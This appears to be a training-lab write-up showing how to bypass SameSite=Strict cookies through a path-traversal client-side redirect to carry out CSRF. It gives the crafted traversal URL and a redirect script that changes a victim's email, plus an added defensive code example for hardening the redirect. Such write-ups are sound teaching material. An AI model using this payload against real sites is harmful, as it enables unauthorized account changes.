
LAB 8 - SameSite Strict bypass via client-side redirect

Initial instructions

This lab's change email function is vulnerable to CSRF. To solve the lab, perform a CSRF attack that changes the victim's email address. You should use the provided exploit server to host your attack.

You can log in to your own account using the following credentials: wiener:peter

First of all, let's log in with the wiener credentials, try to update the account's email address, and intercept that request with Burp Suite.

In the request we can see that it doesn't contain any CSRF token.


Let's take a look at the website and try posting a comment.


After the comment is submitted, the URL in the browser shows the following.


So I tried injecting this path traversal into the postId parameter to see if I would get redirected to /my-account.

/post/comment/confirmation?postId=5/../../my-account

And I got redirected.

With this information, I crafted the following request to change the victim's email address.

/post/comment/confirmation?postId=5/../../my-account/change-email?email=astro@astro.com&submit=1
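As an added example (not code from the lab or from this writeup), the following JavaScript shows why the traversal above works and how the redirect builder on the confirmation page could be hardened. It assumes the page builds its redirect target by concatenating the postId query parameter onto a fixed path prefix; the function names and the https://lab.example origin are placeholders, and the sample inputs are constructed.

```javascript
// Added example, not part of the lab or the writeup.
// Assumption: the confirmation page builds document.location by concatenating
// the untrusted postId parameter onto a fixed prefix (hypothetical function names).

const ORIGIN = "https://lab.example"; // placeholder origin, not the lab's host

// Vulnerable pattern (assumed): postId is concatenated as-is, so "../" segments
// and an embedded query string end up in the URL the browser navigates to.
function vulnerableRedirectTarget(postId) {
  return "/post/" + postId;
}

// Hardened: only a plain decimal id is accepted; anything else falls back to a
// fixed, safe location. No user-controlled characters reach the path.
function safeRedirectTarget(postId) {
  if (typeof postId !== "string" || !/^\d{1,9}$/.test(postId)) {
    return "/";
  }
  return "/post/" + encodeURIComponent(postId);
}

// Resolves a relative path the way document.location does, so the effect of
// ".." segments is visible (URL is a WHATWG global in browsers and Node).
function resolve(path) {
  return new URL(path, ORIGIN);
}

// Defence-in-depth check: after normalisation the target must still sit under
// the expected prefix. A redirect helper should refuse to navigate otherwise.
function staysUnderPrefix(path, prefix) {
  return resolve(path).pathname.startsWith(prefix);
}

// Constructed sample inputs: a normal id, the traversal used in the lab, and the
// traversal with a query string (shown decoded, as the page would see it after
// reading the parameter from location.search).
const SAMPLES = [
  "5",
  "5/../../my-account",
  "5/../../my-account/change-email?email=x@example.com&submit=1",
];

// Returns, for each sample, where the vulnerable and hardened builders send the browser.
function demo() {
  return SAMPLES.map((postId) => {
    const v = resolve(vulnerableRedirectTarget(postId));
    const s = resolve(safeRedirectTarget(postId));
    return {
      input: postId,
      vulnerable: v.pathname + v.search,
      vulnerableUnderPrefix: staysUnderPrefix(vulnerableRedirectTarget(postId), "/post/"),
      hardened: s.pathname + s.search,
    };
  });
}

if (typeof require !== "undefined" && require.main === module) {
  console.table(demo());
}
```

The browser collapses `/post/5/../../my-account` to `/my-account` before issuing the request, and because that request originates from a page on the lab's own origin, a SameSite=Strict session cookie is sent along with it. Validating the parameter to a numeric id closes the redirect abuse; independently, requiring POST with a CSRF token on the change-email endpoint would stop the state change even if some redirect remained steerable.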


So I crafted the following script, hosted on the exploit server, to send to the victim.

<script>
    document.location = "https://YOUR-LAB-ID.web-security-academy.net/post/comment/confirmation?postId=5/../../my-account/change-email?email=pwned%40web-security-academy.net%26submit=1";
</script>


Congratulations, you solved the lab!